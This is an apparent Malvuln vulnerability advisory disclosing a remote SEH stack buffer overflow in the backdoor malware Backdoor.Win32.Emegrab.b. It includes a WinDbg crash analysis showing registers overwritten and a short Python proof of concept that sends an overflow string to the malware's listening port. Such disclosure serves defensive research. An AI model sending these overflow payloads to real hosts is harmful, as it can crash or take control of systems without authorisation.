Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Emegrab.b
Vulnerability: Remote Stack Buffer Overflow (SEH)
Family: Emegrab
Type: PE32
MD5: 19a14d0414aec62ef38378de2e8b259d
Vuln ID: MVID-2024-0675
ASLR: False
DEP: False
CFG: False
Safe SEH: False
Disclosure: 03/13/2024
Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).
Memory Dump:
(14c0.b6c): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:009> .ecxr
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000
eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:009> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e -
FAULTING_IP:
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al
EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8)
ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 26100000
Attempt to write to address 26100000
PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000008
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al
FAILED_INSTRUCTION_ADDRESS:
+fa2b
41414141 ?? ???
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
IP_ON_HEAP: 41414141
IP_IN_FREE_BLOCK: 41414141
CONTEXT: 260f5e38 -- (.cxr 0x260f5e38)
eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74
eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:
0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??
Resetting default scope
FAULTING_THREAD: ffffffff
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b
FRAME_ONE_INVALID: 1
STACK_TEXT:
260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b
260fff88 41414141 unknown!printable+0x0
260fff8c 41414141 unknown!printable+0x0
260fff90 41414141 unknown!printable+0x0
260fff94 41414141 unknown!printable+0x0
260fff98 41414141 unknown!printable+0x0
260fff9c 41414141 unknown!printable+0x0
260fffa0 41414141 unknown!printable+0x0
260fffa4 41414141 unknown!printable+0x0
260fffa8 41414141 unknown!printable+0x0
260fffac 41414141 unknown!printable+0x0
260fffb0 41414141 unknown!printable+0x0
260fffb4 41414141 unknown!printable+0x0
260fffb8 41414141 unknown!printable+0x0
260fffbc 41414141 unknown!printable+0x0
260fffc0 41414141 unknown!printable+0x0
260fffc4 41414141 unknown!printable+0x0
260fffc8 41414141 unknown!printable+0x0
260fffcc 41414141 unknown!printable+0x0
260fffd0 41414141 unknown!printable+0x0
260fffd4 41414141 unknown!printable+0x0
260fffd8 41414141 unknown!printable+0x0
260fffdc 41414141 unknown!printable+0x0
260fffe0 41414141 unknown!printable+0x0
260fffe4 41414141 unknown!printable+0x0
260fffe8 41414141 unknown!printable+0x0
260fffec 41414141 unknown!printable+0x0
260ffff0 41414141 unknown!printable+0x0
260ffff4 41414141 unknown!printable+0x0
260ffff8 41414141 unknown!printable+0x0
260ffffc 41414141 unknown!printable+0x0
26100000 41414141 unknown!printable+0x0
STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d
IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e
DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e
FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown
BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b
0:009> !exchain
260013fc: ntdll!ExecuteHandler2+44 (775e9d70)
260fffcc: 41414141
Invalid exception stack at 41414141
Exploit/PoC:
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=2323
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PAYLOAD="A"*666
s.send(PAYLOAD.encode())
s.close()
print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).